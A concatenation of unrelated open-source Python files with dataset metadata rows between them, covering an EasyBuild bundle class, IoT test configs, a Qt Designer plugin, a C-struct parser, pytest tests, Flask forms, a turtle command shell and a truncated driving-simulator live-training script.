path = os.path.join(self.installdir, subdir)
if path not in curr_paths:
if curr_val:
new_val = '%s:%s' % (path, curr_val)
else:
new_val = path
env.setvar(envvar, new_val)
def make_module_extra(self, *args, **kwargs):
"""Set extra stuff in module file, e.g. $EBROOT*, $EBVERSION*, etc."""
if 'altroot' not in kwargs:
kwargs['altroot'] = self.altroot
if 'altversion' not in kwargs:
kwargs['altversion'] = self.altversion
return super(Bundle, self).make_module_extra(*args, **kwargs)
def sanity_check_step(self, *args, **kwargs):
"""
Nothing is being installed, so just being able to load the (fake) module is sufficient
"""
if self.cfg['exts_list'] or self.cfg['sanity_check_paths'] or self.cfg['sanity_check_commands']:
super(Bundle, self).sanity_check_step(*args, **kwargs)
else:
self.log.info("Testing loading of module '%s' by means of sanity check" % self.full_mod_name)
fake_mod_data = self.load_fake_module(purge=True)
self.log.debug("Cleaning up after testing loading of module")
self.clean_up_fake_module(fake_mod_data)
| gpl-2.0 | 4,453,393,424,235,920,000 | 43.992032 | 119 | 0.604002 | false |
Inventrom/bolt-api-python | tests/config.py | 1 | 1907 | """This file contains all the configurations for unit testing."""
# Configurations for testing GPIO related functions.
GPIO_CONFIG = {
"VALID_PIN": '0',
"VALID_DIGITAL_WRITE_VALUE": "HIGH",
"INVALID_PIN": "16",
"INVALID_DIGITAL_WRITE_VALUE": "MEDIUM",
"SUCCESS_RESPONSE": '1',
"FAILED_RESPONSE": '0',
"INVALID_PIN_RESPONSE": "Invalid pin value",
"INVALID_STATE_RESPONSE": "Invalid state",
"ANALOG_WRITE_VALUE": "100",
"ANALOG_READ_PIN": "A0",
"ANALOG_WRITE_PIN": '0',
"READ_VALUE": "0"
}
# Configurations for testing UART realted functions.
UART_CONFIG = {
"SUCCESS_RESPONSE": '1',
"FAILED_RESPONSE": '0',
"VALID_BAUD_RATE": "9600",
"INVALID_BAUD_RATE": "10",
"VALID_BAUD_RESPONSE": "Success",
"INVALID_BAUD_RESPONSE": "Invalid baud value",
"VALID_TILL": "10",
"INVALID_TILL": "1000",
"VALID_TILL_VALUE": "",
"INVALID_TILL_VALUE": "Invalid till value",
"VALID_WRITE_VALUE": "hello",
"INVALID_WRITE_VALUE": "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.",
"VALID_DATA_RESPONSE": "Serial write Successful",
"INVALID_DATA_RESPONSE": "Command timed out"
}
# Configurations for testing Utilities realted functions.
UTILITY_CONFIG = {
"SUCCESS_RESPONSE": '1',
"FAILED_RESPONSE": '0',
"RESTART_RESPONSE": "Restarted",
"RESTART_ALTERNATIVE_RESPONSE": "Command timed out",
"ONLINE_VALUE": "online"
}
# User configurations.
CREDENTIALS = {
"API_KEY": "xxxx",
"DEVICE_ID": "xxxx"
}
| mit | -4,648,685,357,361,712,000 | 37.14 | 475 | 0.676455 | false |
FreshXOpenSource/wallaby-frontend-qt | wallaby/frontends/qt/plugins/datetimeeditplugin.py | 1 | 1683 | # Copyright (c) by it's authors.
# Some rights reserved. See LICENSE, AUTHORS.
import wallaby.FXUI as FXUI
from wallaby.qt_combat import *
from wallaby.frontends.qt.widgets.edits.dateTimeEdit import DateTimeEdit
#============================================================================#
# The group name in designer widgetbox #
#----------------------------------------------------------------------------#
DESIGNER_GROUP_NAME = "wallaby@fX"
#============================================================================#
# Plugin for CTLiveView #
#----------------------------------------------------------------------------#
class DateTimeEditPlugin(QtDesigner.QPyDesignerCustomWidgetPlugin):
def __init__(self, parent=None):
super(DateTimeEditPlugin, self).__init__(parent)
self.initialized = False
def initialize(self, formEditor):
if self.initialized:
return
self.initialized = True
def isInitialized(self):
return self.initialized
def isContainer(self):
return False
def icon(self):
return FXUI.icon()
def domXml(self):
return '<widget class="DateTimeEdit" name="dateTimeEdit">\n</widget>\n'
def group(self):
return DESIGNER_GROUP_NAME
def includeFile(self):
return "wallaby.frontends.qt.widgets.edits.dateTimeEdit"
def name(self):
return "DateTimeEdit"
def toolTip(self):
return ""
def whatsThis(self):
return ""
def createWidget(self, parent):
return DateTimeEdit(parent)
| bsd-2-clause | 7,495,198,909,785,957,000 | 28.017241 | 79 | 0.496732 | false |
bat-serjo/vivisect | vstruct/cparse.py | 3 | 5364 | from pycparser import c_parser
import pycparser.c_ast as c_ast
import vstruct
import vstruct.primitives as vs_prim
class StructParser:
def __init__(self, psize=4, bigend=False):
self.psize = psize
self.pclass = vs_prim.v_ptr32
self.cls_parsers = {
c_ast.Decl: self.c_getVsDecl,
c_ast.Struct: self.c_getVsStruct,
c_ast.FileAST: self.c_getFileAst,
c_ast.PtrDecl: self.c_getPointer,
#c_ast.FuncDecl: self.c_getFuncDecl,
c_ast.Constant: self.c_getConstant,
c_ast.TypeDecl: self.c_getVsType,
c_ast.ArrayDecl: self.c_getVsArray,
c_ast.IdentifierType: self.c_getIdentType,
}
self.vs_ctypes = {
('char',): vs_prim.v_int8,
('unsigned','char'): vs_prim.v_uint8,
('short',): vs_prim.v_int16,
('short','int'): vs_prim.v_int16,
('unsigned', 'short',): vs_prim.v_uint16,
('unsigned', 'short','int'):vs_prim.v_uint16,
('int',): vs_prim.v_int32,
('unsigned','int',): vs_prim.v_uint32,
('long',): vs_prim.v_int32,
('long','int'): vs_prim.v_int32,
('unsigned','long',): vs_prim.v_uint32,
('unsigned','long','int'): vs_prim.v_uint32,
}
if psize == 8:
self.pclass = vs_prim.v_ptr64
self.vs_ctypes.update({
('long',): vs_prim.v_int64,
('long', 'int'): vs_prim.v_int64,
('long', 'long'): vs_prim.v_int64,
('unsigned', 'long',): vs_prim.v_uint64,
('unsigned', 'long', 'int'): vs_prim.v_uint64,
('unsigned', 'long', 'long'): vs_prim.v_uint64,
})
def _getVsChildElements(self, astelem):
return [ self._getVsElement( c ) for c in astelem[1].children() ]
def _getVsElement(self, astelem):
# An ast element comes as a tuple of namething, realstuff
namething,elem = astelem
p = self.cls_parsers.get( elem.__class__ )
if p is None:
raise Exception('OMG NO PARSER FOR: %r' % elem)
return p( astelem )
def c_getPointer(self, pdecl):
vsclass = self._getVsChildElements( pdecl )[ 0 ]
return self.pclass
def c_getVsArray(self, ardecl):
cls, size = self._getVsChildElements(ardecl)
# Special case char arrays into v_bytes
if cls == vs_prim.v_int8:
return lambda: vs_prim.v_str(size=size)
return lambda: vstruct.VArray( [ cls() for i in range(size) ] )
def c_getIdentType(self, itelem):
ename, einst = itelem
c = self.vs_ctypes.get(tuple(einst.names))
if not c:
raise Exception('Un-plumbed type: %r' % (einst.names,))
return c
def c_getVsType(self, idelem):
ename, einst = idelem
cls = self._getVsChildElements(idelem)[0]
return cls
def c_getVsDecl(self, decelem):
decname = decelem[1].name
return decname,self._getVsChildElements(decelem)[0]
def c_getVsStruct(self, selem):
sname,sinst = selem
def bstruct():
vs = vstruct.VStruct()
vs._vs_name = sinst.name
for cname,chclass in self._getVsChildElements( selem ):
vobj = chclass()
vs.vsAddField(cname, vobj)
return vs
return bstruct
def c_getFileAst(self, elem):
return self._getVsChildElements(elem)
def c_getConstant(self, celem):
return int(celem[1].value)
def c_getFuncDecl(self, felem):
raise NotImplementedError("Implement function declaration parsing!")
def parseStructSource(self, src):
src = preProcessSource( src )
parser = c_parser.CParser()
ast = parser.parse(src)
#ast.show()
for child in ast.children():
xname, decl = self._getVsElement( child )
yield decl
def preProcessSource( src ):
'''
Carry out some *very* basic pre-processor parsing on the given source.
(only function now is remove "//" style comments!)
'''
lines = src.splitlines()
return '\n'.join( [ line.split('//')[0] for line in lines ] )
def ctorFromCSource(src, psize=4, bigend=False):
'''
Parse and return a callable constructor for the
input C structure source.
'''
p = StructParser(psize=psize, bigend=bigend)
return list(p.parseStructSource( src ))[0]
def vsFromCSource(src, psize=4, bigend=False):
'''
Return a vsobj for a structure parsed from C.
'''
return ctorFromCSource(src, psize, bigend)()
class CVStruct(object):
'''
struct example {
int x;
char y[30];
int *z;
};
'''
psize = 4
bigend = False
def __new__(self):
return vsFromCSource(self.__doc__, self.psize, self.bigend)
class awesome(CVStruct):
'''
struct awesome {
int x,z;
char stuff[20];
int y;
struct haha {
int blah;
} s;
int *q;
};
'''
| apache-2.0 | -1,098,476,479,139,844,100 | 29.651429 | 76 | 0.527778 | false |
ideascf/data-packer | test/field/test_single.py | 1 | 5915 | # coding=utf-8
"""
单一的样例
"""
import pytest
from data_packer import DefaultField, OptionalField, PlaceholderField, RequiredField, MagicField
from data_packer import container, err, constant, checker, converter
import data_packer
from _common import run
g_src = {
'a': 1,
'b': 'hello',
'c': ['a', 'b', 'c'],
'd': {
'1': 1,
'2': 2,
},
'e': {
'1': ['a', 'b'],
'2': {
'a': 'a',
'b': 'b'
}
}
}
g_src = container.DictContainer(g_src)
#### 缺省值字段 ####
def test_default():
# 有传入值
fields = [
DefaultField('defalut', src_name='a', dst_name='a')
]
dst = run(fields, g_src)
assert dst['a'] == g_src['a']
# 无传入值
fields = [
DefaultField('default value', src_name='Not Exist', dst_name='Dst name')
]
dst = run(fields, g_src)
assert dst['Dst name'] == 'default value'
#### 可选字段 ####
def test_optional():
# 有传入值
fields = [
OptionalField('b', 'dst name')
]
dst = run(fields, g_src)
assert dst['dst name'] == g_src['b']
# 无传入值
fields = [
OptionalField('Not Exist', 'dst name')
]
dst = run(fields, g_src)
assert dst == {}
#### 占位字段 ####
def test_placeholder():
# 有传入值
fields = [
PlaceholderField('b', 'dst name')
]
dst = run(fields, g_src)
assert dst == {}
# 无传入值
fields = [
PlaceholderField('Not Exist', 'dst name')
]
dst = run(fields, g_src)
assert dst == {}
#### 必填字段 ####
def test_required():
# 有传入值
fields = [
RequiredField('b', 'dst name')
]
dst = run(fields, g_src)
assert dst['dst name'] == g_src['b']
# 无传入值
fields = [
RequiredField('Not Exist', 'dst name')
]
with pytest.raises(data_packer.err.DataPackerSrcKeyNotFoundError):
run(fields, g_src)
class TestMagicField:
def setup_method(self, test_method):
self.field = MagicField('src_name', 'dst_name',
constant.OverwriteMode.OVERWRITE,
checker=checker.NullChecker(), converter=converter.NullConverter())
def test_call_directly(self):
field = MagicField('src_name')
with pytest.raises(err.DataPackerProgramError):
field.run(None, None)
def test_r(self):
r = self.field.r()
# 只改变字段的类型,不改变属性
assert isinstance(r, RequiredField)
assert r.src_name == self.field.src_name
assert r.dst_name == self.field.dst_name
assert r._overwrite == self.field._overwrite
assert r._checker_list == self.field._checker_list
assert r._converter_list == self.field._converter_list
# 改变字段的类型,且改变字段的属性
r = self.field.r(src_name='xyz', dst_name='zyx',
overwrite=constant.OverwriteMode.RAISE, checker=None, converter=None)
assert isinstance(r, RequiredField)
assert r.src_name == 'xyz' and r.src_name != self.field.src_name
assert r.dst_name == 'zyx' and r.src_name != self.field.dst_name
assert r._overwrite == constant.OverwriteMode.RAISE and r._overwrite != self.field._overwrite
assert r._checker_list == None and r._checker_list != self.field._checker_list
assert r._converter_list == None and r._converter_list != self.field._converter_list
def test_o(self):
o = self.field.o()
# 只改变字段的类型,不改变属性
assert isinstance(o, OptionalField)
assert o.src_name == self.field.src_name
assert o.dst_name == self.field.dst_name
assert o._overwrite == self.field._overwrite
assert o._checker_list == self.field._checker_list
assert o._converter_list == self.field._converter_list
# 改变字段的类型,且改变字段的属性
o = self.field.o(src_name='xyz', dst_name='zyx',
overwrite=constant.OverwriteMode.RAISE, checker=None, converter=None)
assert isinstance(o, OptionalField)
assert o.src_name == 'xyz' and o.src_name != self.field.src_name
assert o.dst_name == 'zyx' and o.src_name != self.field.dst_name
assert o._overwrite == constant.OverwriteMode.RAISE and o._overwrite != self.field._overwrite
assert o._checker_list == None and o._checker_list != self.field._checker_list
assert o._converter_list == None and o._converter_list != self.field._converter_list
def test_d(self):
import uuid
default_value = uuid.uuid4().hex
# 只改变字段的类型,不改变属性
d = self.field.d(default_value)
assert isinstance(d, DefaultField)
assert d.src_name == self.field.src_name
assert d.dst_name == self.field.dst_name
assert d._overwrite == self.field._overwrite
assert d._checker_list == self.field._checker_list
assert d._converter_list == self.field._converter_list
assert d.default_value == default_value
# 改变字段的类型,且改变字段的属性
d = self.field.d(default_value, src_name='xyz', dst_name='zyx',
overwrite=constant.OverwriteMode.RAISE, checker=None, converter=None)
assert isinstance(d, DefaultField)
assert d.default_value == default_value
assert d.src_name == 'xyz' and d.src_name != self.field.src_name
assert d.dst_name == 'zyx' and d.src_name != self.field.dst_name
assert d._overwrite == constant.OverwriteMode.RAISE and d._overwrite != self.field._overwrite
assert d._checker_list == None and d._checker_list != self.field._checker_list
assert d._converter_list == None and d._converter_list != self.field._converter_list
| mit | -1,970,213,070,541,719,000 | 31.408046 | 101 | 0.587161 | false |
mfnch/pyrtist | pyrtist/gui/srcview.py | 1 | 4813 | # Copyright (C) 2011 Matteo Franchin
#
# This file is part of Pyrtist.
#
# Pyrtist is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# Pyrtist is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrtist. If not, see <http://www.gnu.org/licenses/>.
import gtk
import config
from undoer import Undoer
# Functions for the undoer.
def delete_fn(_, srcview, del_offs, del_len):
buf = srcview.buf
del_start = buf.get_iter_at_offset(del_offs)
del_end = buf.get_iter_at_offset(del_offs + del_len)
buf.delete(del_start, del_end)
buf.place_cursor(del_start)
def insert_fn(_, srcview, ins_text, ins_offs):
buf = srcview.buf
ins_start = buf.get_iter_at_offset(ins_offs)
buf.insert(ins_start, ins_text)
cursor_pos = buf.get_iter_at_offset(ins_offs + len(ins_text))
buf.place_cursor(cursor_pos)
class BoxSrcView(object):
def _init_textview(self):
view = gtk.TextView()
buf = view.get_buffer()
return (0, view, buf)
def _init_gtksourceview1(self):
try:
import gtksourceview
srcbuf = gtksourceview.SourceBuffer()
langman = gtksourceview.SourceLanguagesManager()
lang = langman.get_language_from_mime_type("text/x-csrc")
srcbuf.set_language(lang)
srcbuf.set_highlight(True)
srcview = gtksourceview.SourceView(srcbuf)
srcview.set_show_line_numbers(True)
return (1, srcview, srcbuf)
except:
return None
def _init_gtksourceview2(self):
try:
import gtksourceview2 as gtksourceview
srcbuf = gtksourceview.Buffer()
langman = gtksourceview.LanguageManager()
search_paths = langman.get_search_path()
search_paths.append(config.get_hl_path())
langman.set_search_path(search_paths)
lang = langman.get_language("python")
srcbuf.set_language(lang)
srcbuf.set_highlight_syntax(True)
srcview = gtksourceview.View(srcbuf)
srcview.set_show_line_numbers(True)
srcview.set_auto_indent(True)
return (2, srcview, srcbuf)
except:
return None
def __init__(self, use_gtksourceview=True, quickdoc=None, undoer=None):
"""Create a new sourceview using gtksourceview2 or gtksourceview,
if they are available, otherwise return a TextView.
"""
self.quickdoc = quickdoc
self.undoer = undoer or Undoer()
first = (0 if use_gtksourceview else 2)
init_fns = [self._init_gtksourceview2,
self._init_gtksourceview1,
self._init_textview]
for attempted_mode in range(first, 3):
mode_view_buf = init_fns[attempted_mode]()
if mode_view_buf:
break
mode, view, buf = mode_view_buf
self.mode = mode
self.view = view
self.buf = buf
view.set_wrap_mode(gtk.WRAP_WORD)
view.set_property("has-tooltip", True)
view.connect("query-tooltip", self._sighandler_query_tooltip)
buf.connect("insert-text", self._sighandler_insert_text)
buf.connect("delete-range", self._sighandler_delete_range)
def _sighandler_query_tooltip(self, srcview, x, y, keyb_mode, tooltip, *etc):
word = self.get_word_at_coords(x, y)
if word != None:
qd = self.quickdoc
if qd != None:
text = qd(word)
if text != None and len(text) > 0:
tooltip.set_text(text)
return True
else:
return False
def _sighandler_insert_text(self, buf, text_iter, ins_text, ins_len):
self.undoer.record_action(delete_fn, self, text_iter.get_offset(), ins_len)
def _sighandler_delete_range(self, buf, del_iter_start, del_iter_end):
ins_text = buf.get_text(del_iter_start, del_iter_end)
self.undoer.record_action(insert_fn, self, ins_text,
del_iter_start.get_offset())
def get_iter_at_coords(self, x, y):
bx, by = self.view.window_to_buffer_coords(gtk.TEXT_WINDOW_WIDGET, x, y)
return self.view.get_iter_at_location(bx, by)
def get_word_at_coords(self, x, y, max_length=20):
iter_begin = self.get_iter_at_coords(x, y)
if iter_begin.get_char().isalnum():
iter_end = iter_begin.copy()
isnotalnum = lambda c, _: not c.isalnum()
if iter_begin.backward_find_char(isnotalnum, None, None):
if iter_begin.forward_char():
if iter_end.forward_find_char(isnotalnum, (), None):
return self.buf.get_text(iter_begin, iter_end)
return None
| lgpl-2.1 | -547,014,662,898,154,300 | 33.625899 | 79 | 0.666528 | false |
TeamBasedLearning/Service | pgtbl/tbl/wsgi.py | 1 | 1382 | """
WSGI config for tbl project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "oauth2.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tbl.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
| gpl-3.0 | -4,567,427,804,351,289,300 | 42.1875 | 79 | 0.787265 | false |
PNJenkinson/emicroblog | app/forms.py | 1 | 1508 | from flask_wtf import Form
from flask_babel import gettext
from wtforms import StringField, BooleanField, TextAreaField
from wtforms.validators import DataRequired, Length
from .models import User
class LoginForm(Form):
openid = StringField('openid', validators=[DataRequired()])
remember_me = BooleanField('remember_me', default=False)
class EditForm(Form):
nickname = StringField('nickname', validators=[DataRequired()])
about_me = TextAreaField('about_me', validators=[Length(min=0, max=140)])
def __init__(self, original_nickname, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
self.original_nickname = original_nickname
def validate(self):
if not Form.validate(self):
return False
if self.nickname.data == self.original_nickname:
return True
if self.nickname.data != User.make_valid_nickname(self.nickname.data):
self.nickname.errors.append(gettext(
'This nickname has invalid characters. '
'Please use letters, numbers, dots and underscores only.'))
return False
user = User.query.filter_by(nickname=self.nickname.data).first()
if user is not None:
self.nickname.errors.append(gettext(
'This nickname is already in use. '
'Please choose another one.'))
return False
return True
class PostForm(Form):
post = StringField('post', validators=[DataRequired()])
| bsd-3-clause | -8,724,458,139,495,668,000 | 34.069767 | 78 | 0.649867 | false |
haihabi/simpy | simpy/core/result/container.py | 1 | 5182 | import simpy
import numpy as np
import pickle
import os
class Result(object):
def __init__(self, test_case, *args):
self.test_case = test_case
if len(args) == 0:
raise Exception('result cant be empty args')
elif len(args) % 2 != 0:
raise Exception('result args must be even number')
else:
result = dict()
for i in range(round(args.__len__())):
if i % 2 == 0:
name = args[i]
if not isinstance(name, str):
raise Exception('first input in a couple must be string')
if i % 2 == 1:
if result.get(name) is None:
result.update({name: args[i]})
else:
raise Exception('result all ready exists')
self.result = result
def has_same_param(self, result):
return self.test_case.has_same_param(result.test_case)
def get_result(self, name):
res = self.result.get(name)
if res is None:
raise Exception('result name:' + name + 'does not exists')
return res
def get_test_name(self):
return self.test_case.get_name()
def get_result_dict(self):
return self.result
class ResultContainer(object):
def __init__(self, global_params, test_result=[]):
self.global_params = global_params
self.test_result = test_result
self.current = 0
def clear(self):
self.test_result.clear()
def is_empty(self):
return self.test_result.__len__() == 0
def add_result(self, result):
if not isinstance(result, Result):
raise Exception('input must be of type result')
self.test_result.append(result)
def __iter__(self):
return self
def __next__(self): # Python 3: def __next__(self)
if self.current >= self.test_result.__len__():
raise StopIteration
else:
test_result = self.test_result[self.current]
self.current += 1
return test_result
def reset_iterator(self):
self.current = 0
def recreate_iterator(self):
return ResultContainer(self.global_params, self.test_result)
def get_test_cases(self):
return [i.test_case for i in self.test_result]
def __build_result__(self):
result_dict_list = []
test_list = []
for r in self.recreate_iterator():
result_dict_list.append(r.get_result_dict())
test_list.append(r.get_test_name())
return result_dict_list, test_list
def plot_result(self, plot_cfg_list, path_save=None):
"""
This function get a list of plot configs and plot them on the same figure
:param plot_cfg_list:List of plot config
:param save:None or str of path
:return: Nothing
"""
assert isinstance(plot_cfg_list, list)
assert np.all([isinstance(plot_cfg, simpy.PlotConfiguration) for plot_cfg in plot_cfg_list])
result_dict_list, test_list = self.__build_result__()
[plot_cfg.plot_multiple_result(result_dict_list, test_list, True,
save=os.path.join(path_save, 'figure' + str(i) + '.png')) for i, plot_cfg in
enumerate(plot_cfg_list)]
def plot_test_by_test(self, plot_cfg_list, path_save=None):
assert isinstance(plot_cfg_list, list)
assert np.all([isinstance(plot_cfg, simpy.PlotConfiguration) for plot_cfg in plot_cfg_list])
result_dict_list, test_list = self.__build_result__()
for rdl, tl in zip(result_dict_list, test_list):
test_base = os.path.join(path_save, tl)
os.mkdir(test_base)
[plot_cfg.plot_multiple_result([rdl], [tl], True,
save=os.path.join(test_base, 'figure' + str(i) + '.png')) for i, plot_cfg in
enumerate(plot_cfg_list)]
def print_summary(self, data_post_processing, save=None):
result_dict_list, test_list = self.__build_result__()
output_str = self.summary_function(data_post_processing, result_dict_list, test_list)
print(output_str)
if save is not None:
text_file = open(save, "w")
text_file.write(output_str)
text_file.close()
print("Saving summary to file:" + save)
@staticmethod
def summary_function(data_post_processing, result_dict_list, test_list):
output_str = ''
for tn, rd in zip(test_list, result_dict_list):
output_str = output_str + tn + '[ '
for m, pf in data_post_processing.items():
output_str = output_str + m + ':' + str(pf(rd.get(m))) + ' '
output_str = output_str + ' ]' + "\n"
return output_str
@staticmethod
def loader(file_path):
res = pickle.load(open(file_path, "rb"))
if not isinstance(res, ResultContainer): raise Exception('the loaded pickle is not a of type result container')
return res
def saver(self, file_path):
pickle.dump(self, open(file_path, "wb"))
| mit | -8,767,696,397,707,231,000 | 35.751773 | 119 | 0.56677 | false |
ArthurChiao/code-snippets | python/turtleshell.py | 1 | 2878 | """
Example code from python doc:
https://docs.python.org/3.3/library/cmd.html
The Cmd class provides a simple framework for writing line-oriented command
interpreters. These are often useful for test harnesses, administrative tools,
and prototypes that will later be wrapped in a more sophisticated interface.
"""
import cmd, sys
from turtle import *
class TurtleShell(cmd.Cmd):
intro = 'Welcome to the turtle shell. Type help or ? to list commands.\n'
prompt = '(turtle) '
file = None
# ----- basic turtle commands -----
def do_forward(self, arg):
'Move the turtle forward by the specified distance: FORWARD 10'
forward(*parse(arg))
def do_right(self, arg):
'Turn turtle right by given number of degrees: RIGHT 20'
right(*parse(arg))
def do_left(self, arg):
'Turn turtle left by given number of degrees: LEFT 90'
left(*parse(arg))
def do_goto(self, arg):
'Move turtle to an absolute position with changing orientation. GOTO 100 200'
goto(*parse(arg))
def do_home(self, arg):
'Return turtle to the home postion: HOME'
home()
def do_circle(self, arg):
'Draw circle with given radius an options extent and steps: CIRCLE 50'
circle(*parse(arg))
def do_position(self, arg):
'Print the current turle position: POSITION'
print('Current position is %d %d\n' % position())
def do_heading(self, arg):
'Print the current turle heading in degrees: HEADING'
print('Current heading is %d\n' % (heading(),))
def do_color(self, arg):
'Set the color: COLOR BLUE'
color(arg.lower())
def do_undo(self, arg):
'Undo (repeatedly) the last turtle action(s): UNDO'
def do_reset(self, arg):
'Clear the screen and return turtle to center: RESET'
reset()
def do_bye(self, arg):
'Stop recording, close the turtle window, and exit: BYE'
print('Thank you for using Turtle')
self.close()
bye()
return True
# ----- record and playback -----
def do_record(self, arg):
'Save future commands to filename: RECORD rose.cmd'
self.file = open(arg, 'w')
def do_playback(self, arg):
'Playback commands from a file: PLAYBACK rose.cmd'
self.close()
with open(arg) as f:
self.cmdqueue.extend(f.read().splitlines())
def precmd(self, line):
line = line.lower()
if self.file and 'playback' not in line:
print(line, file=self.file)
return line
def close(self):
if self.file:
self.file.close()
self.file = None
def parse(arg):
'Convert a series of zero or more numbers to an argument tuple'
return tuple(map(int, arg.split()))
if __name__ == '__main__':
TurtleShell().cmdloop()
| mit | -8,552,807,441,469,732,000 | 34.097561 | 86 | 0.61501 | false |
sjaa/scheduler | membership/config-example.py | 1 | 1338 | from enum import Enum, unique
TEST_EMAIL_MODE = 'print' # 'test email'
TEST_EMAIL_ADDR = 'Membership Chair <[email protected]>'
@unique
class MembershipStatus(Enum):
expired = 0 # 'expired' must be < 'expiring'
expiring = 10
active = 11
admin = 100
coordator = 200
CHOICES_MEM_STATUS = (
( MembershipStatus.expired .value, 'expired' ),
( MembershipStatus.expiring.value, 'expiring'),
( MembershipStatus.active .value, 'active' )
)
# Send membership renewal notices:
# 30 and 7 days before and 1 day after expiration date
# -n means 'n' days before, n means days after expiration
RENEWAL_NOTICE_DAYS = (-30, -7, 1)
MEMBERSHIP_CHAIR_EMAIL_ADDR = 'Membership Chair <[email protected]>'
RENEWAL_NOTICE_TEXT = '''\
# To: {addr_to}
# From: {addr_from}
# Subject: {subject}
{first_name},
Your <Your org> membership will expire in {days} days on {date}. To renew your membership, please go to:
https://www.sjaa.net/join-the-sjaa/
Sincerely,
Me
<Your org> Membership Chair'''
EXPIRED_NOTICE_TEXT = '''\
# To: {addr_to}
# From: {addr_from}
# Subject: {subject}
{first_name},
Your <Your org> membership expired on {date}. To renew your membership, please go to:
https://www.sjaa.net/join-the-sjaa/
Sincerely,
Dave Ittner
<Your org> Membership Chair'''
| gpl-3.0 | 8,368,260,173,327,536,000 | 22.892857 | 105 | 0.655456 | false |
jingzhehu/udacity_sdcnd | term1/P3_behavior_cloning/live_trainer.py | 1 | 12049 | """
Live trainer script for Udacity SDC sim
- Control car with Keras model
- Override with manual control
- Train model during manual control
- Record data from simulator
Usage guide
- accelerate/decelerate with "up/down" arrow keys
- navigation with "left/right" arrow keys
- change steering angle to "0" with "c" key
- toggle manual/auto mode with "x" key
- while in manual mode, toggle training with "z" key
- toggle image recording with "r" key
"""
# authored by Thomas Antony
# modified by Jingzhe Hu @ 01/07/2017
# changed preprocessing and added rudimentary data recording feature
training_batch_size = 48
checkpoint_filename = './checkpoint.h5'
# hdf_recordings = "./recorded_data/data.h5"
dir_recordings = './recorded_data/'
steering_angle_recordings = "./recorded_data/steering_angle.csv"
learning_rate = 0.001
## PLEASE DO NOT EDIT PAST THIS POINT
__author__ = 'Thomas Antony'
import os
import csv
import sys
import h5py
import time
import tkinter
import argparse
import base64
import json
import cv2
import numpy as np
import pandas as pd
from server import ControlServer
from platform import system as platform
from datetime import datetime
import matplotlib.image as mpimg
import socketio
import eventlet
import eventlet.wsgi
from flask import Flask
from functools import partial
from keras.models import model_from_json
from keras.optimizers import Adam, RMSprop
class LiveTrainer(object):
def __init__(self, model):
# Control variables
self.steering_angle = 0
self.throttle = 0
# State
self.speed = 0
# Parameters
self.speed_limit = 30
self.turn_rate = 0.5
self.steering_limit = 15. / 25.
self.centering_torque = 0.01 / 25.
# Helper functions
self.turn_left = partial(self.turn, direction=-1)
self.turn_right = partial(self.turn, direction=+1)
self.speed_up = partial(self.speed_control, direction=+1)
self.slow_down = partial(self.speed_control, direction=-1)
# Control server for getting data from simulator
self.control_srv = ControlServer()
self.control_srv.register_callback(self) # Callback for telemetry
self.mode = 'auto' # can be 'auto' or 'manual'
self.is_training = False # Trains model if set to true
self.is_recording = False # Record camera images and steering angle
# self.recorded_images = []
# self.recorded_steering_angles = []
self.model = model
self.current_X = [] # List of images
self.current_Y = [] # List of steering angles
# Performance metrics
self.start_time = None
self.last_switch_time = None
self.auto_time = 0
def init_gui(self):
# Create the root window
self.root = tkinter.Tk()
self.root.geometry('350x100+490+550')
self.root.title('SDC Live Trainer')
# Create a label with status
self.status = tkinter.StringVar()
label = tkinter.Label(self.root, width=350, height=100,
textvariable=self.status)
label.pack(fill=tkinter.BOTH, expand=1)
# Bind key event handlers
self.root.bind('<Left>', lambda e: self.turn_left())
self.root.bind('<Right>', lambda e: self.turn_right())
self.root.bind('<Up>', lambda e: self.speed_up())
self.root.bind('<Down>', lambda e: self.slow_down())
self.root.bind('<Key>', self.keydown)
self.update_status()
# Start UI loop
eventlet.spawn_after(1, self.main_loop)
def start_server(self):
self.control_srv.start() # Start server
def focus_gui(self):
self.root.focus_force()
# OSX code for focusing window
if platform() == 'Darwin':
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
def main_loop(self):
self.focus_gui()
while True:
try:
self.root.update_idletasks()
self.root.update()
except:
pass
eventlet.sleep(0.01)
def update_status(self):
str_mode = 'Autopilot Engaged' if self.mode == 'auto' else 'Manual override'
str_train_text = 'Training neural net ...' if self.is_training else ''
str_recording = 'Recording images and steering angle ...' if self.is_recording else ''
if self.start_time is not None:
now = time.time()
total_time = now - self.start_time
auto_time = self.auto_time
if self.mode == 'auto':
auto_time += (now - self.last_switch_time)
str_rating = auto_time / total_time
else:
str_rating = 0.0
status_txt = '{0}\nAutnomous rating: {1:.2%}\n{2}\n{3}\nSpeed = {4:4.2f} mph, Steering angle = {5:4.2f} deg'
